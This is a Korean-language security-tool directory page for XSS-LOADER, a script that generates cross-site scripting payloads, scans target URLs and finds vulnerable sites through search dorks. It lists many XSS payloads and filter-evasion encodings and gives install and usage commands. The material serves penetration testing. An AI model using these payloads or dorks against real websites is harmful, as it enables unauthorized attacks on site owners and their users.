Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XSS-LOADER — Xss 페이로드 생성기 ~ Xss 스캐너 ~ Xss Dork Finder | Kitploit
도구/GitHubGitHub/capture0x/xss-loader
Web Vulnerability ScannersPayload GenerationWeb Application ExploitationWAF BypassPenetration Testing
GitHubcapture0x/xss-loader

XSS-LOADER

Xss 페이로드 생성기 ~ Xss 스캐너 ~ Xss Dork Finder

저장소 보기
6211233개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

💎   XSS-LOADER TOOLS   💎

작성자: TMRSWRR

버전 1.0.0

XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER를 위한 올인원 도구

Instagram: TMRSWRR

📷 스크린샷 📷

👇 💌 사용 방법 💌 👇

How to use

📒 읽어보기 📒

  • 이 도구는 XSS 인젝션에 사용할 페이로드를 생성합니다.
  • 매개변수에서 기본 페이로드 태그를 선택하거나 직접 페이로드를 작성하세요.
  • XSS 스캐너 매개변수로 XSS 인젝션을 수행합니다.
  • XSS Dork 파인더 매개변수로 취약한 사이트 URL을 찾습니다.

💿 설치 💿

requirements.txt로 설치

root@kitploit:~
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

사용법

root@kitploit:~
python3 payloader.py

🗃️ 기능 🗃️

*Basic Payload

기본 매개변수를 다음으로 설정 :<script>alert(1)</script>

*Div Payload

기본 매개변수를 다음으로 설정 :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload

기본 매개변수를 다음으로 설정 :``````

*Body Payload

기본 매개변수를 다음으로 설정 :<body ontouchstart=alert(1)>

*Svg Payload

기본 매개변수를 다음으로 설정 :<svg onload=alert('1')>

*Enter Your Payload

사용자가 작성한 페이로드를 인코딩합니다.

*Payload Generator Parameter

선택한 태그의 페이로드를 인코딩합니다.

root@kitploit:~
* |   1.  대문자---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  대소문자 혼합----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL 인코딩 ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML 엔티티 인코딩----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  페이로드 분할 ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX 인코딩 ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 인코딩 -----> 페이로드를 utf-16 형식으로 인코딩합니다.   
* |   8.  UTF-32 인코딩-----> 페이로드를 utf-32 형식으로 인코딩합니다.          
* |   9.  태그 삭제 -----> ";alert('XSS');//            
* |  10.  유니코드 인코딩----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII 인코딩 ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 인코딩 ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 인코딩 ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  괄호 우회 ----->  <script>alert`1`</script>   
* |  15.  UTF-8 인코딩 ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  태그 블록 탈출-----> "><script>alert(1)</script>
* |  17.  스크립트 탈출----->  </script><script>alert(1)</script>
* |  18.  파일 업로드 페이로드-----> "><script>alert(1)</script>.gif
* |  19.  주석 내부 우회-----> <!--><script>alert(1)</script>-->
* |  20.  변이 페이로드-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  잘못된 형식의 IMG-----> <script>alert(1)</script>">
* |  22.  공백 우회-----> 
* |  23.  하위 수준 숨김 블록-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF 우회 페이로드 목록-----> WAF 우회 페이로드 목록 보기
* |  25.  Cloudflare 우회 페이로드 목록-----> Cloudflare 우회 페이로드 목록 보기
* |  26.  폴리글롯 페이로드 목록-----> 폴리글롯 우회 페이로드 목록 보기
* |  27.  경고 페이로드 목록-----> 경고 페이로드 목록 보기
* |  28.  모든 페이로드 생성-----> 모든 페이로드 생성 보기
* |  29.  메인 메뉴로 돌아가기
* |  30.  종료

*XSS 스캐너

먼저 대상의 URL을 입력해야 합니다. 다음 예시와 같이 URL을 입력하세요==>예: target -----> http://target.com/index.php?name= 스캔할 페이로드 목록을 선택합니다.

  • BASIC PAYLOAD LIST ==> 스크립트 태그로 구성된 페이로드 목록
  • DIV PAYLOAD LIST ==> div 태그로 구성된 페이로드 목록
  • IMG PAYLOAD LIST ==> img 태그로 구성된 페이로드 목록
  • BODY PAYLOAD LIST ==> body 태그로 구성된 페이로드 목록
  • SVG PAYLOAD LIST ==> svg 태그로 구성된 페이로드 목록
  • MIXED PAYLOAD LIST ==> 모든 태그로 구성된 페이로드 목록
  • ENTER FILE PATH ==> 사용자가 지정한 페이로드 목록, 다음 예시와 같이 URL을 입력하세요..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

스캔 후 결과는 "vulnpayload.txt"에 추가됩니다.

*XSS Dork Finder

먼저 검색할 dork를 입력하세요: e.g---->inurl:"search.php?q=" 스캔 후 결과는 "dork.txt"에 저장됩니다.

알려진 문제

수정됨:

  • 유니코드 오류
  • 모듈 오류

중요:

Windows에 설치된 python3에서 도구를 사용하려면 아래 링크를 다운로드하세요:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

버그 및 개선 사항

버그 신고나 개선 사항은 이슈를 열어 주세요.

저작권 2020

도구 다운로드